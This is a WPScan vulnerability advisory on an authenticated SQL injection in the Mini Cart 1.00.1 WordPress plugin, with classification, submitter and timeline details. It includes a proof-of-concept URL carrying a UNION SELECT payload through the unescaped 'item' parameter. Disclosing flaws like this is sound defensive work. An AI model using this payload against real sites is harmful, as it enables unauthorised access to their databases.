Mini Cart Plugin 1.00.1 - Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
$_REQUEST[item] is not escaped. Url is accessible for user collaborator above.

Url vulnerable : http://target/wp-admin/edit.php?page=mini-cart/item_form.php&item=0&action=edit
Proof of Concept
http://target/wp-admin/edit.php?page=mini-cart%2Fitem_form.php&item=0+UNION+SELECT+1,2,3,4,5,name,7,8,9,10+from+wp_terms+where+term_id=1&action=edit

Affects

Plugin mini-cart

References

URL http://lenonleite.com.br/en/blog/2016/11/11/mini-cart-plugin-1-00-1-for-wordpress/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 54
Verified No
WPVDB ID 8671

Timeline

Publicly Published 2016-11-11 (28 days ago)
Added 2016-11-21 (18 days ago)
Last Updated 2016-11-21 (18 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.